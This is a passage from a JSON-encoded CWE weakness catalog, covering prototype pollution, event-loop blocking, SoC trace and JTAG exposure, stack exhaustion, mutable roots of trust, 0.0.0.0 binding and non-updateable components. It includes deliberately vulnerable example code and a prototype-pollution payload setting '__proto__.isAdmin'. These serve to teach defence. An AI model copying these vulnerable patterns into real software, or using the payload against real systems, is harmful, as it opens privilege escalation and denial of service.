Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Likelihood":"High","Note":"An attacker can inject attributes that are used in other components."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Likelihood":"High","Note":"An attacker can override existing attributes with ones that have incompatible type, which may lead to a crash."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.","Effectiveness":"High","Effectiveness_Notes":"While this can mitigate this weakness completely, other methods are recommended when possible, especially in components used by upstream software (\\"libraries\\")."},{"Phase":"Architecture and Design","Description":"By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.","Effectiveness":"High"},{"Phase":"Implementation","Strategy":"Input Validation","Description":"When handling untrusted objects, validating using a schema can be used.","Effectiveness":"Limited"},{"Phase":"Implementation","Description":"By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This function sets object attributes based on a dot-separated path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"function setValueByPath (object, path, value) {","xhtml:br":"","xhtml:div":{"#text":"const pathArray = path.split(\\".\\");const attributeToSet = pathArray.pop();let objectToModify = object;for (const attr of pathArray) {objectToModify[attributeToSet] = value;return object;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"if (typeof objectToModify[attr] !== \'object\') {objectToModify = objectToModify[attr];}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"objectToModify[attr] = {};}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"setValueByPath({}, \\"__proto__.isAdmin\\", true)setValueByPath({}, \\"constructor.prototype.isAdmin\\", true)","xhtml:br":["",""]}},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"function setValueByPath (object, path, value) {","xhtml:br":"","xhtml:div":{"#text":"const pathArray = path.split(\\".\\");const attributeToSet = pathArray.pop();let objectToModify = object;for (const attr of pathArray) {objectToModify[attributeToSet] = value;return object;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"if (attr === \\"__proto__\\" || attr === \\"constructor\\" || attr === \\"prototype\\") {if (typeof objectToModify[attr] !== \\"object\\") {objectToModify = objectToModify[attr];}","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"// Ignore attributes which resolve to object prototype","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"continue;}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"objectToModify[attr] = {};}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}}}],"Body_Text":["This function does not check if the attribute resolves to the object prototype. These codes can be used to add \\"isAdmin: true\\" to the object prototype.","By using a denylist of dangerous attributes, this weakness can be eliminated."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-3721","Description":"Prototype pollution by merging objects.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3721"},{"Reference":"CVE-2019-10744","Description":"Prototype pollution by setting default values to object attributes recursively.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10744"},{"Reference":"CVE-2019-11358","Description":"Prototype pollution by merging objects recursively.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358"},{"Reference":"CVE-2020-8203","Description":"Prototype pollution by setting object attributes based on dot-separated path.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8203"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1148"}},{"attr":{"@_External_Reference_ID":"REF-1149"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous External Contributor","Submission_Date":"2020-08-25"}}},"1322":{"attr":{"@_ID":"1322","@_Name":"Use of Blocking Code in Single-threaded, Non-blocking Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a non-blocking model that relies on a single threaded process\\n\\t\\t\\tfor features such as scalability, but it contains code that can block when it is invoked.","Extended_Description":{"xhtml:p":["When an attacker can directly invoke the blocking code, or the blocking code can be affected by environmental conditions that can be influenced by an attacker, then this can lead to a denial of service by causing unexpected hang or freeze of the code. Examples of blocking code might be an expensive computation or calling\\n\\t\\t\\t\\tblocking library calls, such as those that perform exclusive file operations or require a successful network operation.","Due to limitations in multi-thread models, single-threaded\\n\\t\\t\\t\\tmodels are used to overcome the resource constraints that are caused by using\\n\\t\\t\\t\\tmany threads. In such a model, all code should generally be\\n\\t\\t\\t\\tnon-blocking. If blocking code is called, then the event loop will\\n\\t\\t\\t\\teffectively be stopped, which can be undesirable or dangerous.  Such\\n\\t\\t\\t\\tmodels are used in Python asyncio, Vert.x, and Node.js, or other\\n\\t\\t\\t\\tcustom event loop code.",""]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"835","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"An unexpected call to blocking code can trigger an infinite loop, or a large loop that causes the software to pause and wait indefinitely."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Generally speaking, blocking calls should be\\n\\t\\t\\t\\t\\treplaced with non-blocking alternatives that can be used asynchronously.\\n\\t\\t\\t\\t\\tExpensive computations should be passed off to worker threads, although\\n\\t\\t\\t\\t\\tthe correct approach depends on the framework being used."},{"Phase":"Implementation","Description":"For expensive computations, consider breaking them up into\\n\\t\\t\\t\\t\\tmultiple smaller computations. Refer to the documentation of the\\n\\t\\t\\t\\t\\tframework being used for guidance."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Content_History":{"Submission":{"Submission_Name":"Joe Harvey","Submission_Date":"2019-10-25"}}},"1323":{"attr":{"@_ID":"1323","@_Name":"Improper Management of Sensitive Trace Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Trace data collected from several sources on the\\n                System-on-Chip (SoC) is stored in unprotected locations or\\n                transported to untrusted agents.","Extended_Description":{"xhtml:p":["To facilitate verification of complex System-on-Chip\\n                    (SoC) designs, SoC integrators add specific IP blocks that\\n                    trace the SoC\'s internal signals in real-time. This\\n                    infrastructure enables observability of the SoC\'s internal\\n                    behavior, validation of its functional design,\\n                    and detection of hardware and software bugs. Such tracing\\n                    IP blocks collect traces from several sources on the SoC\\n                    including the CPU, crypto coprocessors, and on-chip fabrics. Traces collected from these sources are then\\n                    aggregated inside trace IP block and forwarded to trace\\n                    sinks, such as debug-trace ports that facilitate debugging by\\n                    external hardware and software debuggers.","Since\\n                    these traces are collected from several security-sensitive\\n                    sources, they must be protected against untrusted\\n                    debuggers. If they are stored in unprotected memory, an\\n                    untrusted software debugger can access these traces and\\n                    extract secret information. Additionally, if\\n                    security-sensitive traces are not tagged as secure, an\\n                    untrusted hardware debugger might access them to extract\\n                    confidential information."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory","Note":"An adversary can read secret values if they are captured in debug traces and stored unsafely."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Tag traces to indicate owner and debugging privilege level (designer, OEM, or end user) needed to access that trace."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In a SoC, traces generated from sources\\n                        include security-sensitive IP blocks such as CPU (with\\n                        tracing information such as instructions executed and\\n                        memory operands), on-chip fabric (e.g., memory-transfer\\n                        signals, transaction type and destination, and\\n                        on-chip-firewall-error signals), power-management\\n                        IP blocks (e.g., clock- and power-gating signals), and\\n                        cryptographic coprocessors (e.g., cryptographic keys and\\n                        intermediate values of crypto operations), among\\n                        other non-security-sensitive IP blocks including timers\\n                        and other functional blocks. The collected traces are\\n                        then forwarded to the debug and trace interface used by\\n                        the external hardware debugger.","Example_Code":[{"#text":"The traces do\\n                        not have any privilege level attached to them. All\\n                        collected traces can be viewed by any debugger (i.e., SoC\\n                        designer, OEM debugger, or end user).","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Some of the\\n                        traces are SoC-design-house secrets, while some are OEM\\n                        secrets. Few are end-user secrets and the rest are\\n                        not security-sensitive. Tag all traces with the\\n                        appropriate, privilege level at the source. The bits\\n                        indicating the privilege level must be immutable in\\n                        their transit from trace source to the final, trace\\n                        sink. Debugger privilege level must be checked before\\n                        providing access to traces.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"167"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1150"}},{"attr":{"@_External_Reference_ID":"REF-1151"}}]},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-07-20"}}},"1324":{"attr":{"@_ID":"1324","@_Name":"Sensitive Information Accessible by Physical Probing of JTAG Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sensitive information in clear text on the JTAG\\n                interface may be examined by an eavesdropper, e.g.\\n                by placing a probe device on the interface such as a logic\\n                analyzer, or a corresponding software technique.","Extended_Description":{"xhtml:p":"On a debug configuration with a remote host,\\n                    unbeknownst to the host/user, an attacker with physical\\n                    access to a target system places a probing device on the\\n                    debug interface or software related to the JTAG port e.g.\\n                    device driver. While the authorized host/user performs\\n                    sensitive operations to the target system, the attacker\\n                    uses the probe to collect the JTAG traffic."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"300","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"May be introduced when design does not plan for an attacker having physical access while legitimate user is remotely operating device"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Files or Directories","Read Application Data"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Manufacturing","Description":"Disable permanently the JTAG interface before releasing the system to untrusted users.","Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Encrypt all information (traffic) on the JTAG interface using an approved algorithm (such as recommended by NIST). Encrypt the path from inside the chip to the trusted user application.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Block access to secret data from JTAG.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A TAP accessible register is read/written by a JTAG\\n                        based tool, for internal tool use for an authorized\\n                        user.  The JTAG based tool does not provide access to\\n                        this data to an unauthorized user of the tool.\\n                        However, the user can connect a probing device and\\n                        collect the values directly from the JTAG interface, if\\n                        no additional protections are employed."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"167"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Organization":"Accellera Systems Initiative","Submission_Date":"2020-10-01"}}},"1325":{"attr":{"@_ID":"1325","@_Name":"Improperly Controlled Sequential Memory Allocation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects.","Extended_Description":{"xhtml:p":"While the product might limit the amount of memory that is allocated in a single operation for a single object (such as a malloc of an array), if an attacker can cause multiple objects to be allocated in separate operations, then this might cause higher total memory consumption than the developer intended, leading to a denial of service."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"789","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Exhaustion","Description":"When a weakness allocates excessive memory on the stack, it is often described as \\"stack exhaustion,\\" which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Memory)","Note":"Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure multiple allocations of the same kind of object are properly tracked - possibly across multiple sessions, requests, or messages. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary."},{"Phase":"Operation","Description":"Run the program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example contains a small allocation of stack memory. When the program was first constructed, the number of times this memory was allocated was probably inconsequential and presented no problem. Over time, as the number of objects in the database grow, the number of allocations will grow - eventually consuming the available stack, i.e. \\"stack exhaustion.\\" An attacker who is able to add elements to the database could cause stack exhaustion more rapidly than assumed by the developer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int end_limit = get_nmbr_obj_from_db();int i;int *base = NULL;int *p =base;for (i = 0; i &lt; end_limit; i++){}","xhtml:i":"// Gets the size from the number of objects in a database, which over time can conceivably get very large","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"*p = alloca(sizeof(int *));p = *p;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// Allocate memory on the stack","// // Point to the next location to be saved"],"xhtml:br":["",""]}}},"Body_Text":"Since this uses alloca(), it allocates memory directly on the stack.  If end_limit is large enough, then the stack can be entirely consumed."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-36049","Description":"JavaScript-based packet decoder uses concatenation of many small strings, causing out-of-memory (OOM) condition","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36049"},{"Reference":"CVE-2019-20176","Description":"Product allocates a new buffer on the stack for each file in a directory, allowing stack exhaustion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20176"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"130"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-12-07"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}}},"1326":{"attr":{"@_ID":"1326","@_Name":"Missing Immutable Root of Trust in Hardware","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) implements secure boot by verifying or authenticating signed boot code. The signing of the code is achieved by an entity that the SoC trusts.  Before executing the boot code, the SoC verifies that the code or the public key with which the code has been signed has not been tampered with. The other data upon which the SoC depends are system-hardware settings in fuses such as whether \u201cSecure Boot is enabled\u201d. These data play a crucial role in establishing a Root of Trust (RoT) to execute secure-boot flows.","One of the many ways RoT is achieved is by storing the code and data in memory or fuses. This memory should be immutable, i.e., once the RoT is programmed/provisioned in memory, that memory should be locked and prevented from further programming or writes. If the memory contents (i.e., RoT) are mutable, then an adversary can modify the RoT to execute their choice of code, resulting in a compromised secure boot.","Note that, for components like ROM, secure patching/update features should be supported to allow authenticated and authorized updates in the field."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during policy definition, hardware architecture, design, manufacturing, and/or provisioning and can be identified later during testing or system configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Authentication","Authorization"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Modify Memory"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Automated testing can verify that RoT components are immutable.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Root of trust elements and memory should be part of architecture and design reviews.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the system, the RoT should be designated for storage in a memory that does not allow further programming/writes."},{"Phase":"Implementation","Description":"During implementation and test, the RoT memory location should be demonstrated to not allow further programming/writes."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The RoT is stored in memory. This memory can be modified by an adversary. For example, if an SoC implements \u201cSecure Boot\u201d by storing the boot code in an off-chip/on-chip flash, the contents of the flash can be modified by using a flash programmer. Similarly, if the boot code is stored in ROM (Read-Only Memory) but the public key or the hash of the public key (used to enable \u201cSecure Boot\u201d) is stored in Flash or a memory that is susceptible to modifications or writes, the implementation is vulnerable.","Body_Text":["In general, if the boot code, key materials and data that enable \u201cSecure Boot\u201d are all mutable, the implementation is vulnerable.","Good architecture defines RoT as immutable in hardware. One of the best ways to achieve immutability is to store boot code, public key or hash of the public key and other relevant data in Read-Only Memory (ROM) or One-Time Programmable (OTP) memory that prevents further programming or writes."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"68"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1152"}},{"attr":{"@_External_Reference_ID":"REF-1153"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"}}},"1327":{"attr":{"@_ID":"1327","@_Name":"Binding to an Unrestricted IP Address","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely.","Extended_Description":{"xhtml:p":"When a server binds to the address 0.0.0.0, it allows connections from every IP address on the local machine, effectively exposing the server to every possible network. This might be much broader access than intended by the developer or administrator, who might only be expecting the server to be reachable from a single interface/network."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Client Server","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Cloud Computing","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"System Configuration"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Amplification","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"System Configuration","Description":"Assign IP addresses that are not 0.0.0.0.","Effectiveness":"High"},{"Phase":"System Configuration","Strategy":"Firewall","Description":"Unwanted connections to the configured server may be denied through a firewall or other packet filtering measures.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code snippet uses 0.0.0.0 in a Puppet script.","Example_Code":[{"#text":"signingserver::instance {","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":"","xhtml:div":{"#text":"\\"nightly-key-signing-server\\":}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listenaddr     =&gt; \\"0.0.0.0\\",port           =&gt; \\"9100\\",code_tag       =&gt; \\"SIGNING_SERVER\\",","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}},{"#text":"signingserver::instance {","attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:br":"","xhtml:div":{"#text":"\\"nightly-key-signing-server\\":}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"listenaddr     =&gt; \\"127.0.0.1\\",port           =&gt; \\"9100\\",code_tag       =&gt; \\"SIGNING_SERVER\\",","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},"xhtml:br":""}}],"Body_Text":"The Puppet code snippet is used to provision a signing server that will use 0.0.0.0 to accept traffic. However, as 0.0.0.0 is unrestricted, malicious users may use this IP address to launch frequent requests and cause denial of service attacks."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1158"}},{"attr":{"@_External_Reference_ID":"REF-1159"}}]},"Content_History":{"Submission":{"Submission_Name":"Akond Rahman","Submission_Organization":"Tennessee Technological University","Submission_Date":"2020-09-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}}},"1328":{"attr":{"@_ID":"1328","@_Name":"Security Version Number Mutable to Older Versions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) implements secure boot or verified boot. It might support a security version number, which prevents downgrading the current firmware to a vulnerable version. Once downgraded to a previous version, an adversary can launch exploits on the SoC and thus compromise the security of the SoC. These downgrade attacks are also referred to as roll-back attacks.","The security version number must be stored securely and persistently across power-on resets. A common weakness is that the security version number is modifiable by an adversary, allowing roll-back or downgrade attacks or, under certain circumstances, preventing upgrades (i.e. Denial-of-Service on upgrades). In both cases, the SoC is in a vulnerable state."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"757","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware architecture and design, and can be identified later during testing or system configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Authentication","Authorization"],"Impact":"Other","Likelihood":"High","Note":"Impact includes roll-back or downgrade to a vulnerable version of the firmware or DoS (prevent upgrades)."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Mutability of stored security version numbers and programming with older firmware images should be part of automated testing.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Anti-roll-back features should be reviewed as part of Architecture or Design review.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the system, security version data should be designated for storage in registers that are either read-only or have access controls that prevent modification by an untrusted agent."},{"Phase":"Implementation","Description":"During implementation and test, security version data should be demonstrated to be read-only and access controls should be validated."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A new version of firmware is signed with a security version number higher than the previous version. During the firmware update process the SoC checks for the security version number and upgrades the SoC firmware with the latest version. This security version number is stored in persistent memory upon successful upgrade for use across power-on resets.","Body_Text":["In general, if the security version number is mutable, the implementation is vulnerable. A mutable security version number allows an adversary to change the security version to a lower value to allow roll-back or to a higher value to prevent future upgrades.","The security version number should be stored in immutable hardware such as fuses, and the writes to these fuses should be highly access-controlled with appropriate authentication and authorization protections."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"176"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1329":{"attr":{"@_ID":"1329","@_Name":"Reliance on Component That is Not Updateable","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs.","Extended_Description":{"xhtml:p":["If the component is discovered to contain a vulnerability or critical bug, but the issue cannot be fixed using an update or patch, then the product\'s operator will not be able to protect against the issue.  This could leave the product open to attacker exploitation or critical operation failures.","In industries such as healthcare, \\"legacy\\"\\n\\t\\t\\t    devices can be operated for decades.  As a\\n\\t\\t\\t    US task force report notes, \\"the inability\\n\\t\\t\\t    to update or replace equipment has both\\n\\t\\t\\t    large and small health care delivery\\n\\t\\t\\t    organizations struggle with numerous\\n\\t\\t\\t    unsupported legacy systems that cannot\\n\\t\\t\\t    easily be replaced (hardware, software and\\n\\t\\t\\t    operating systems) with large numbers of\\n\\t\\t\\t    vulnerabilities and few modern\\n\\t\\t\\t    countermeasures.\\" [REF-1197]","While hardware can be prone to this weakness, software systems can also be affected, such as when a third-party driver or library is no longer actively maintained or supported but is still critical for the required functionality."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Designers might omit capabilities for updating a component due to time pressures to release the product or assumptions about the stability of the component."}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Reduce 